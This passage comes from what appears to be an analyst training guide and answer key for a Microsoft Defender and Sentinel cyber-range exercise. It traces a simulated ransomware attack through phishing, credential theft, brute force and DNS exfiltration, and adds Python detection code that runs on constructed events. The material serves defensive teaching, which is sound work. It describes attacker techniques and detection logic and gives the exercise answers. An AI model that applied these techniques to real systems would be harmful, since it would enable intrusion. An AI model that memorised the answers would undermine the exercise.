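             "TaskContent": TASK_XML.format(command=command)}),
    }


# Constructed rows: paths, timestamps and the DC's binary name are placeholders.
SAMPLE_DEVICE_EVENTS: List[Dict] = [
    _task_row("2022-08-02T13:05:11Z", "dc01", "Network Controller Manager",
              "C:\\ProgramData\\PLACEHOLDER_callback.exe"),
    _task_row("2022-08-02T12:41:03Z", "floor-5-adm", "Network Controller Manager",
              "C:\\Windows\\Temp\\svchost.exe"),
    _task_row("2022-08-01T09:00:00Z", "floor-3-desk", "Adobe Acrobat Update Task",
              "C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"),
    # A non-task event on the same host, to show the ActionType filter at work.
    {"Timestamp": "2022-08-02T12:40:59Z", "DeviceName": "floor-5-adm",
     "ActionType": "ProcessCreated", "InitiatingProcessFileName": "powershell.exe",
     "AdditionalFields": "{}"},
]

# Binaries whose names attackers like to borrow, and where the real copies live.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_task_command(task_content: str) -> Optional[str]:
    """Pull the <Command> element out of scheduled-task XML, namespaced or not."""
    try:
        root = ET.fromstring(task_content)
    except ET.ParseError:
        return None
    for element in root.iter():
        if element.tag.rsplit("}", 1)[-1] == "Command" and element.text:
            return element.text.strip()
    return None


def looks_masqueraded(path: str) -> bool:
    """True when a system-binary name is used from outside the system directories."""
    normalised = path.replace("/", "\\").lower()
    name = normalised.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARIES and not normalised.startswith(SYSTEM_DIRS)


def hunt_scheduled_task(rows: List[Dict], task_name: str) -> List[Dict]:
    """Every ScheduledTaskCreated row whose task name matches, oldest first."""
    wanted = task_name.strip("\\").lower()
    hits = []
    for row in rows:
        if row.get("ActionType") != "ScheduledTaskCreated":
            continue
        fields = json.loads(row.get("AdditionalFields") or "{}")
        if str(fields.get("TaskName", "")).strip("\\").lower() != wanted:
            continue
        command = parse_task_command(fields.get("TaskContent", "")) or ""
        hits.append({
            "Timestamp": row["Timestamp"],
            "DeviceName": row["DeviceName"],
            "Command": command,
            "Executable": command.replace("/", "\\").rsplit("\\", 1)[-1],
            "Masquerading": looks_masqueraded(command),
        })
    return sorted(hits, key=lambda hit: hit["Timestamp"])


def executables_by_device(rows: List[Dict], task_name: str) -> Dict[str, str]:
    """Map each device that registered the task to the executable it runs."""
    return {hit["DeviceName"]: hit["Executable"]
            for hit in hunt_scheduled_task(rows, task_name)}


if __name__ == "__main__":
    for hit in hunt_scheduled_task(SAMPLE_DEVICE_EVENTS, "Network Controller Manager"):
        flag = "  <-- system-binary name outside System32" if hit["Masquerading"] else ""
        print(f'{hit["Timestamp"]} {hit["DeviceName"]:<12} {hit["Executable"]}{flag}')
```

The masquerading check is the part the Timeline view leaves to the analyst: a file called svchost.exe is only unremarkable when it lives in System32, so the hunt output flags the copy registered on floor-5-adm while leaving the genuine Adobe updater task alone.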
Before attempting to move laterally again, the attacker sought to gather some very
important data. They had successfully gained access to a machine with 'adm' in the
hostname, so they may have been hoping to luck into more administrator credentials.
By gathering password hashes, they could attempt to crack them or try to achieve
authentication via pass-the-hash exploits.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Unlike using system tools that might not be detected by Microsoft Defender for
Endpoint, credential harvesting tools tend to raise flags. Not only was the behavior
seen and alerted on, Microsoft 365 Defender successfully correlated its connection
to the callback malware that allowed the attacker to establish access.
This time, Microsoft 365 Defender alerted on the behavior while referencing the
scripting language used to invoke the credential harvesting tool. PowerShell has only
increased in popularity over the years, both for system administrators and attackers.
Through the course of this attack, we see the attacker repeatedly rely on built-in
PowerShell capabilities and also download and import their own modules.
In Microsoft 365 Defender, navigate to the Devices List under the Assets category,
then select floor-5-adm from the list. Choose the Alerts tab to view the alerts
detected on this particular endpoint. Look for an alert title referencing a credential
theft tool.
Mimikatz
How was the attacker even able to run a credential harvester? Many techniques used
by attackers to gather credentials are automatically detected and blocked by
Microsoft Defender for Endpoint. We can even see alerts about the tools used being
detected, so why weren't they stopped?
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint event logs. This gives us a view into events that might have been captured
by the local Windows Event platform even if it wasn't alerted on by Defender for
Endpoint. Based on past experience, the environment was already configured with
informational event alerts that relate to administrative activity. Because some
behavior was already configured to alert, we can see Incidents where our Analytics
rules were triggered.
The Incidents tab in Microsoft Sentinel is a great place to see incidents gathered
from across your security tools. In addition to the Microsoft Sentinel incidents, you'll
be able to see incidents from Microsoft 365 Defender, Defender for Endpoint, and
Defender for Identity.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an informational-level incident referencing a tactic that could be used by the
attacker for defense evasion as well as to eliminate roadblocks to their attack.
The following query could also be used in the Logs tab to manually find these results:
But how did the attacker even get access to this endpoint? That's the next question
we need to answer. It doesn't look like this was their initial access, so where did they
move laterally from? For that, we'll look for credential access alerts. For additional
information about the tools and features that might be helpful, reference the
"Investigate incidents with Microsoft Sentinel" link in the Documentation folder on
your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint Security Event logs. This gives us a view into events that might have been
captured by the local Windows Event platform even if it wasn't alerted on by
Defender for Endpoint. Based on past experience, the environment was already
configured with security event alerts for known-bad activity, such as remote brute
force. Because some behavior was already configured to alert, we can see Incidents
where our Analytics rules were triggered.
The Incidents tab in Microsoft Sentinel is a great place to see incidents gathered
from across your security tools. In addition to the Microsoft Sentinel incidents, you'll
be able to see incidents from Microsoft 365 Defender, Defender for Endpoint, and
Defender for Identity.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an incident title indicating a tactic that could be used to achieve credential access
to enable lateral movement. In this case, you'll find an incident targeting a remote
access protocol.
Brute Force
From those alerts, we can drill into the logs to find where the brute force was coming
from. A brute force from outside the environment likely would have gotten blocked
by the firewall, so maybe it came from the initial access endpoint.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint Security Event logs. This gives us a view into events that might have been
captured by the local Windows Event platform even if it wasn't alerted on by
Defender for Endpoint. Based on past experience, the environment was already
configured with security event alerts for known-bad activity, such as remote brute
force. Because some behavior was already configured to alert, we can see Incidents
where our Analytics rules were triggered.
Once you know what incident you want to drill into, you'll easily be able to pivot to
viewing the relevant alerts or events. A quick way to get to the network flow logs that
relate to the alert is by choosing Events from the Incident details pane, selecting a
single alert from the timeline, then clicking the Link to LA. This will automatically
generate a LogAnalytics query to get all the results related to that alert.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an incident title indicating a tactic that could be used to achieve credential
access, specifically the Remote Authentication Brute Force incident. Select that
incident then click view full details to see all the related information. Select a single
alert in the timeline, and select Link to LA to view the results in LogAnalytics. Look for
an IP address in the IPEntity or IpAddress column.
172.16.40.5
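What the Remote Authentication Brute Force analytics rule and the Link to LA results are showing is a burst of failed logons (Windows Security event 4625) from one source address, optionally followed by a success (4624) from that same address. The example below is added to this guide and is not code from Circadence or Microsoft; it applies that rule logic in Python to constructed rows that imitate columns of the Sentinel SecurityEvent table. The account names, timestamps and the second, benign source address are placeholders; only the source 172.16.40.5 and the target floor-5-adm come from the guide. The first function is the equivalent of a KQL summarize count() by IpAddress over failed logons, the second adds the time window and the follow-up success that separate a compromise from background noise.

```python
"""Brute-force source identification over Windows Security events.

Constructed example: the rows imitate Sentinel SecurityEvent columns
(TimeGenerated, EventID, Computer, Account, LogonType, IpAddress) and are
made up for this exercise; account names are placeholders.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

FAILED_LOGON = 4625
SUCCESSFUL_LOGON = 4624


def _event(ts: datetime, event_id: int, computer: str, account: str, ip: str) -> Dict:
    # LogonType 10 is RemoteInteractive (RDP); the scenario targets a remote access protocol.
    return {"TimeGenerated": ts, "EventID": event_id, "Computer": computer,
            "Account": account, "LogonType": 10, "IpAddress": ip}


BASE = datetime(2022, 8, 2, 14, 0, 0)
SAMPLE_SECURITY_EVENTS: List[Dict] = (
    # 12 failed remote-interactive logons in 77 seconds from one source,
    # cycling through a short list of guessed accounts (constructed).
    [_event(BASE + timedelta(seconds=7 * i), FAILED_LOGON, "floor-5-adm",
            f"UVMHEALTH\\guess{i % 4}", "172.16.40.5") for i in range(12)]
    # ...then a success from the same source a few seconds later.
    + [_event(BASE + timedelta(seconds=90), SUCCESSFUL_LOGON, "floor-5-adm",
              "UVMHEALTH\\placeholder_admin", "172.16.40.5")]
    # Benign noise: three mistyped passwords spread over an hour.
    + [_event(BASE + timedelta(minutes=20 * i), FAILED_LOGON, "floor-5-adm",
              "UVMHEALTH\\placeholder_user", "172.16.40.22") for i in range(3)]
)


def failed_logons_by_source(rows: List[Dict]) -> Counter:
    """The 'summarize count() by IpAddress' view an analyst looks at first."""
    return Counter(r["IpAddress"] for r in rows if r["EventID"] == FAILED_LOGON)


def find_brute_force_sources(rows: List[Dict], threshold: int = 10,
                             window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Sources with >= threshold failed logons inside any sliding window.

    A success from the same source shortly after the burst is the detail
    that turns 'noisy' into 'compromised', so it is reported alongside.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for r in rows:
        key = (r["IpAddress"], r["Computer"])
        if r["EventID"] == FAILED_LOGON:
            failures[key].append(r)
        elif r["EventID"] == SUCCESSFUL_LOGON:
            successes[key].append(r["TimeGenerated"])

    findings = []
    for (ip, computer), events in failures.items():
        events.sort(key=lambda r: r["TimeGenerated"])
        times = [r["TimeGenerated"] for r in events]
        start, peak = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_failure = times[-1]
        followed = any(last_failure <= t <= last_failure + window
                       for t in successes[(ip, computer)])
        findings.append({
            "IpAddress": ip,
            "Computer": computer,
            "Failures": len(events),
            "PeakInWindow": peak,
            "Accounts": sorted({r["Account"] for r in events}),
            "FollowedBySuccess": followed,
        })
    return sorted(findings, key=lambda f: -f["PeakInWindow"])


if __name__ == "__main__":
    print(failed_logons_by_source(SAMPLE_SECURITY_EVENTS))
    for finding in find_brute_force_sources(SAMPLE_SECURITY_EVENTS):
        print(finding)
```

The raw count alone already points at 172.16.40.5, but the windowed version is what an analytics rule needs: three typos an hour apart from 172.16.40.22 never reach the threshold, while the burst does, and the trailing 4624 tells you which account to treat as compromised.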
Internal phishing is one of the many lateral movement techniques that can be used by
attackers. For them, its benefits can include the opportunity to escalate their access
privileges while flying below the radar.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Email flow can be investigated using the Email & collaboration Explorer. By default,
the Explorer displays metrics about all email, with views on malware, phishing, and
campaigns also available. The available tabs also show the top malware families, top
targeted users, email origins, and campaigns. The View options may be useful as you
proceed with your investigation.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Select the Advanced filter button to create
a filter with multiple parameters.
- Directionality: Intra-org
Use the Query button to submit the query, then adjust your time frame if needed. Hit
Refresh after changing your time frame to see the list of results. Look at the sender
column to determine the source account of the email that doesn’t look like normal
enterprise email traffic.
*Note: to keep data current, the platform toggles between uvmhealth1 and uvmhealth2; if one does not
work, try the other.
jroader@uvmhealthX*.onmicrosoft.com
For additional information about the tools and features that might be helpful,
reference the "Email security with Threat Explorer in Microsoft Defender for Office
365" link in the Documentation folder on your Analyst desktop.
In this scenario, external phishing gave the attacker initial access via an endpoint that
was not protected by Defender for Endpoint. Microsoft 365 Defender is a great tool
to find the answer to this question. Access Microsoft 365 Defender through the
shortcut on the desktop or navigate to https://security.microsoft.com.
Email flow can be investigated using the Email & collaboration Explorer. By default,
the Explorer displays metrics about all email, with views on malware, phishing, and
campaigns also available. The available tabs also show the top malware families, top
targeted users, email origins, and campaigns. The View options may be useful as you
proceed with your investigation.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Select the Advanced filter button to create
a filter with multiple parameters. Using the Add a condition button, add the following
filter types and values:
- Directionality: Inbound
Use the Query button to submit the query, then adjust your timeframe if needed. Hit
Refresh after changing your timeframe to see the list of results. Review the Sender
column in the list of results to identify the source address of the phishing email that
led to an account compromise.
*Note: to keep data current, the platform toggles between uvmhealth1 and uvmhealth2; if one does not work,
please try the other.
systems@maxdefense.com
For additional information about the tools and features that might be helpful,
reference the "Email security with Threat Explorer in Microsoft Defender for Office
365" link in the Documentation folder on your Analyst desktop.
Since the initially accessed endpoint did not have Defender for Endpoint Real-Time
Protection enabled, the email attachment was able to download callback malware
using a macro. Based on mail logs and alerts about malware prevented on protected
endpoints, you can identify the exact file that was attached to phishing emails sent to
the users.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality. After finding the source email, you can drill into the details to discover
information about the attachment itself.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Change the filter type to Sender and add
the known source address to the filter field. Adjust your timeframe if needed, then hit
Refresh to see the list of results. Click on a single email, then scroll to the bottom of
the informational pane to view the attachments.
nmis_connectivity.docx
Sometimes when investigating an incident, you stumble across alerts that are
completely unrelated to the path you're uncovering. These unrelated alerts are
important to take note of to ensure they are appropriately reviewed and prioritized
for remediation.
For additional information about the tools and features that might be helpful,
reference the "Investigate alerts in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
Most alerts in Microsoft Defender provide enough information to quickly identify that
unsupported devices or operating systems have alerted on suspicious activity, such
as accessing websites or IP addresses known for phishing and other malicious
activity.
In Microsoft 365 Defender, navigate to the Alerts list under the Incidents & alerts
category. Look for an informational-level alert that references a device attempting to
access a phishing site and an investigation state "Unsupported OS." Open that alert
to see on which device the detection took place.
bberg_android
A macro is an action or a set of actions that you can run as many times as you want.
When you create a macro, you are recording your mouse clicks and keystrokes.
When a macro is run, it performs each action. As a result, malicious macros can be
created that execute commands, such as the PowerShell command used in this
scenario to download the callback malware.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Since we're seeking to find events related to the creation of files and execution of
commands, Microsoft 365 Defender is going to be the best place to look. Defender
for Endpoint gathers information about what takes place on onboarded endpoints
and performs correlation to make analysis more efficient.
While the original email attachment wasn't considered malicious itself, Defender for
Endpoint still recognizes download and execution behavior by Microsoft Word as
suspicious. Therefore, we can find alerts that break down the sequence of events
that led to the callback malware being created on the endpoint and executed.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Look for an alert that references Office
running suspicious commands. Scroll through that Alert Story to find an event where
PowerShell executed a script immediately followed by the execution of a uniquely
named executable.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
4axxl10r.exe
Automation For the Win - On which endpoint could Microsoft 365 Defender Automated
Investigations remediate the detection of a Meterpreter post-exploitation tool?
For additional information about the tools and features that might be helpful,
reference the "Automated investigation and response in Microsoft 365 Defender" link
in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
Automated investigations that are triggered by alerts can be analyzed to see how
Microsoft 365 Defender identified these alerts and, more importantly, whether they were
remediated or are pending analyst approval of actions.
Viewing the investigations that relate to privilege escalation incidents will help
quickly identify the suspicious activity and how it was handled by the system. For
more detailed information, you can select this investigation and view a graph which
shows all alert activity related to this endpoint.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then select the Investigations tab. One investigation will reference a
ransomware infection being prevented. You can use the “Triggering alert” or “Status”
filters to find the answer more easily. The answer to this question can be seen in the
Entities column, or by opening the investigation page and reviewing the graph or
Devices tab.
Note: Depending on the Azure data refresh cycle, the answer to this objective will sometimes be “floor-3-desk”
and other times it will be “picu-5”. Please advise your players accordingly.
Getting Their Bearings - What system tool did the attacker use to enumerate active network
connections?
Once they achieved initial access, the attacker sought to get the lay of the land and
identify endpoints to move laterally. DNS enumeration is a common technique for
this, as it can tell attackers the hostnames and IP addresses for endpoints across the
domain. Attackers love to use tools that already exist in the victim environment when
they can, a technique referred to as "living off the land." Doing so can help them
blend in with normal activities. Even if their usage of a particular tool triggers an alert,
security practitioners are used to false positives caused by their own administration
activities.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
As we're looking for evidence about the execution of commands, Microsoft 365
Defender is going to be the best place to look. Defender for Endpoint gathers
information about what takes place on onboarded endpoints and performs
correlation to make analysis more efficient.
In this scenario, the attacker leveraged a system tool commonly used for displaying
active network connections for this endpoint. To find evidence we can look at alerts
in Microsoft 365 Defender. The tool itself wasn't flagged as malicious or anything, but
the contextual behavior was considered suspicious by Defender.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Look for an alert that references the
suspicious discovery of network connections. Read through the Alert Story until you
find an event for the execution of a system tool for displaying network statistics with
relevance to the alert.
netstat.exe
Hey, That's My Data! What is the filename of the archive exfiltrated by the attacker?
For additional information about the tools and features that might be helpful,
reference the "Proactively hunt for threats with advanced hunting” link in the
Documentation folder on your Analyst desktop.
During their discovery once they achieved initial access, the attacker came across
some potentially valuable data. By exfiltrating it, they could use it to try to extort a
higher ransom payment than ransomware alone might've gotten. Unfortunately, this
is becoming a common practice alongside ransomware in order to put more pressure
on organizations to pay up. A great backup and restoration process might save you
from ransomware, but it can't delete your data from the attacker's device.
Fortunately, Microsoft 365 Defender knows what normal data sharing looks like. By
attempting to blend in with DNS network traffic, the attacker actually generated host
events. It isn't considered normal for large amounts of data to be passed over DNS,
and Defender for Endpoint also recognized the command used to perform the
exfiltration contained the name of a local file.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents and Alerts.
Look for the incident concerning privilege escalation and ransomware. Open that
incident, then view the list of related alerts. Look for an alert about data exfiltration.
Viewing the details, scroll through the Alert Story and look for an executable
performing exfiltration over DNS. The command used to execute that executable will
contain the filename of the archive being exfiltrated.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
UVMHealth_Data.zip
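The two signals the hint above describes, a volume of DNS queries that does not look like name resolution and a command line that names a local file, can be checked mechanically. The example below is added to this guide and is not code from Circadence or Microsoft; it scores DNS lookups per device and domain (many queries, long leading labels, almost no repeats), pulls archive file names out of process command lines, and joins the two on the device. The DNS records, the host name host-a, the documentation-reserved domain and the placeholder tool name in the command line are all constructed; only the archive name UVMHealth_Data.zip comes from the guide. The thresholds are starting points for a lab, not tuned production values.

```python
"""Detection-side replay of the DNS exfiltration reasoning.

Constructed example: the DNS lookups and the process command line are
made up and only imitate the kind of per-device data Defender for
Endpoint records; the labels are sha256 digests and carry no content.
"""
import hashlib
import re
from collections import defaultdict
from statistics import mean
from typing import Dict, List, Optional


def _dns(device: str, query: str) -> Dict:
    return {"DeviceName": device, "QueryName": query}


NORMAL_NAMES = ["login.microsoftonline.com", "graph.microsoft.com", "www.bing.com"]

# Ordinary SaaS lookups, then a burst of long, never-repeating labels under
# one domain: from the resolver's side that is what tunnelled data looks like.
SAMPLE_DNS_EVENTS: List[Dict] = (
    [_dns("host-a", NORMAL_NAMES[i % 3]) for i in range(30)]
    + [_dns("host-a", hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48]
            + ".constructed-exfil.example") for i in range(40)]
)

# Constructed process row; the tool name is a placeholder, not the real one.
SAMPLE_PROCESS_EVENTS: List[Dict] = [{
    "DeviceName": "host-a",
    "ProcessCommandLine": ('"C:\\Users\\Public\\PLACEHOLDER_dnstool.exe" '
                           "--domain constructed-exfil.example "
                           "C:\\Users\\Public\\UVMHealth_Data.zip"),
}]

# A file name token ending in a common archive extension (no path separators).
ARCHIVE_RE = re.compile(r'([^\s"\\/:*?<>|]+\.(?:zip|7z|rar|tar\.gz|tgz))\b', re.IGNORECASE)


def registered_domain(name: str) -> str:
    """Collapse a query name to its last two labels (good enough for a lab)."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def flag_dns_exfil_candidates(events: List[Dict], min_queries: int = 20,
                              min_label_len: int = 30,
                              min_unique_ratio: float = 0.9) -> List[Dict]:
    """Per device and domain: many queries, long leading labels, few repeats."""
    per_domain = defaultdict(list)
    for e in events:
        key = (e["DeviceName"], registered_domain(e["QueryName"]))
        per_domain[key].append(e["QueryName"].lower())
    findings = []
    for (device, domain), names in per_domain.items():
        avg_len = mean(len(n.split(".")[0]) for n in names)
        unique_ratio = len(set(names)) / len(names)
        if (len(names) >= min_queries and avg_len >= min_label_len
                and unique_ratio >= min_unique_ratio):
            findings.append({"DeviceName": device, "Domain": domain,
                             "Queries": len(names),
                             "AvgLabelLength": round(avg_len, 1),
                             "UniqueRatio": round(unique_ratio, 2)})
    return sorted(findings, key=lambda f: -f["Queries"])


def extract_archive_name(cmdline: str) -> Optional[str]:
    """First archive file name mentioned on a command line, or None."""
    match = ARCHIVE_RE.search(cmdline)
    return match.group(1) if match else None


def correlate_exfil(dns_events: List[Dict], process_events: List[Dict]) -> List[Dict]:
    """Join flagged domains to processes on the same device that name them."""
    results = []
    for finding in flag_dns_exfil_candidates(dns_events):
        for p in process_events:
            cmd = p["ProcessCommandLine"]
            if p["DeviceName"] == finding["DeviceName"] and finding["Domain"] in cmd.lower():
                results.append({**finding, "Archive": extract_archive_name(cmd),
                                "CommandLine": cmd})
    return results


if __name__ == "__main__":
    for result in correlate_exfil(SAMPLE_DNS_EVENTS, SAMPLE_PROCESS_EVENTS):
        print(result)
```

The SaaS lookups never trip the heuristic: they repeat constantly and their leading labels are a handful of characters, while the tunnelled burst is forty unique 48-character labels under one domain. The join then hands the analyst exactly what the Alert Story gives them here, the process, the domain and the archive name in its command line.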
Moving on to the next phase of the investigation, let's start with a simple one that you
were just gathering details about. This is a common question during the reporting and
lessons-learned phases of incident response, as it's often seen as the key issue by
stakeholders. Simply put, how did they get in? While it's never the full story, people
tend to assume that if the attacker hadn't gotten in, the rest of the attack couldn't have
happened. While that's true, we have to remember that attackers are adaptive and will
keep trying different methods until one works. While we're busy trying to patch all the
holes, they just need to find one.
For additional information about the tools and features that might be helpful, reference
the "Investigate incidents in Microsoft 365 Defender" link in the Documentation folder on
your Analyst desktop.
In addition to gathering and correlating events into alerts and incidents within each tool,
Microsoft 365 Defender also performs correlation across Defender for Endpoint,
Defender for Identity, and Email Protection. In this scenario, Microsoft 365 Defender was
able to connect the initial phishing emails to the callback malware via a Chain Event
Detection.
The Chain Event Detection tag means that Microsoft 365 Defender is correlating across
multiple data sources to connect what might have otherwise appeared to be unrelated
events. In this scenario, the previously-considered-benign email attachment is correlated
to the suspicious behavior exhibited by Microsoft Word.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts. Look
for the incident concerning privilege escalation and ransomware*. Open that incident,
then view the list of related alerts. The first alert in the chain gives a clue as to the source
of the initial compromise. Open the "Malicious email attachment" alert, then choose “View
alert details” to view some additional alert details in the right-hand pane. The MITRE
ATT&CK Techniques section lists one technique specifically.
phishing
As we see in this scenario, it only took one user opening a bad attachment for the
rest of the attack path to be played out by the attacker. Recognizing that the
attacker's scope was broader than just one user is a good reminder of what we're up
against. In this environment, it was just seven other users, but in a real enterprise
environment it's likely to be hundreds or thousands.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
In addition to gathering and correlating events into alerts and incidents within each
tool, Microsoft 365 Defender also performs correlation across Defender for Endpoint,
Defender for Identity, and Email Protection. In this scenario, Microsoft 365 Defender
was able to connect the initial phishing emails to the callback malware via a Chain
Event Detection. Even though none of the other recipients were successfully
compromised, Microsoft 365 Defender recognizes that they were also targeted.
The Chain Event Detection tag means that Microsoft 365 Defender is correlating
across multiple data sources to connect what might have otherwise appeared to be
unrelated events. In this scenario, the previously-considered-benign email
attachment is correlated to the suspicious behavior exhibited by Microsoft Word.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. The first alert in the chain gives a clue as
to the source of the initial compromise. Open the “Malicious email attachment” alert;
there will be a box at the top with a count of accounts that received the malicious
attachment. Click on that box to view all accounts, and the answer will be everyone
except the user that was compromised.
Over the course of the ensuing attack, the attacker managed to gain access to
multiple endpoints. Gathering that information into one cohesive thought is handy to
have up your sleeve during discussions about the scope and impact of the attack, as
well as while you're planning security enhancement efforts. We're trying to put
everything we learned along the way together to fill out the context surrounding the
attack. We've gathered a lot of particulars and specifics, but now we need to
correlate across the phases to make sure we understand the full scope of the attack.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
With an incident's details you'll find a summary tab, but the Graph tab can be of great
help when trying to fully understand the scope of an incident. The Summary is great
for metrics, but the Graph tab is where we can see how the attack progressed, what
was impacted, and what indicators were detected by our security tools.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the Graph tab. Play the attack story, pausing or stepping through
as needed to see each lateral movement to a new endpoint appear in the graph after
the initial access endpoint.
floor-5-adm, dc01
Identifying all the user accounts compromised by the attacker is also important as
you evaluate everything the attacker was able to do and everything they could have
accessed. Those three accounts will certainly require remediation, and a greater
conversation will be necessary to determine whether a domain-wide password reset
is warranted.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
With an incident's details you'll find a summary tab, but the alerts tab can be of
greater interest to security practitioners. The Summary is great for metrics, but the
Alerts tab is where we can see how the attack progressed, what was impacted, and
what was detected or prevented by our security tools.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Scroll through the list and take note of
the Impacted Entities column, specifically looking for changes in the user account as
the attack progresses. Scroll through the Impacted Entities column to find all three
compromised accounts.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
For additional information about the tools and features that might be helpful,
reference the "Automate threat response with playbooks in Microsoft Sentinel" link in
the Documentation folder on your Analyst desktop.
Over the course of our investigation, we identified three lateral movement and
credential access techniques used by the attacker. As we consider remediation and
security enhancement efforts, we'll want to consider how to ensure those techniques
cannot be used against us in any future attacks.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Some questions require multiple tools to answer. This time, in addition to leveraging
Microsoft 365 Defender, we also need to remember what Microsoft Sentinel
detected in the network traffic. Microsoft Sentinel's Analytics rules can analyze
network traffic for anomalies or concerning patterns.
To find what we need in Microsoft 365 Defender, we'll want to review the Incident
Alerts as well as the Email Quarantine. To find what we're looking for in Microsoft
Sentinel we need to review the Incidents.
This question requires a process of elimination, so here's how to find evidence for
each technique the attacker did use.
Password Hash Harvesting: In Microsoft 365 Defender, look for an alert named
"Mimikatz credential theft tool" or "Malicious credential theft tool execution". These
alerts are included in the "Multi-stage incident involving Privilege escalation* including
Ransomware on multiple endpoints reported by multiple sources" incident.
User Creation
Turning our focus to an important external factor, we'll also want to evaluate where
the attack originated from a network perspective. While blacklisting every single IP
address that scans your external IP range may be too tedious to maintain, blacklisting
the source of an attack is certainly warranted. While investigating the network traffic,
you may also discover evidence of reconnaissance being performed prior to the
attack. All of this information could contribute to effective network monitoring or
alerting changes.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Once again, this answer could be found in either Microsoft 365 Defender or Microsoft
Sentinel. Think back through the investigation to consider at what points each IP
address might have been used by the attacker. The two IP addresses served different
purposes - one acted as the connection point for callbacks, the other provided a
download source for staging malware and tools.
Microsoft 365 Defender grabbed events containing each IP address from various
points in the attack. Alert stories reference each IP address, depending on what
activity it was used for. The alerts related to callback malware are likely to provide
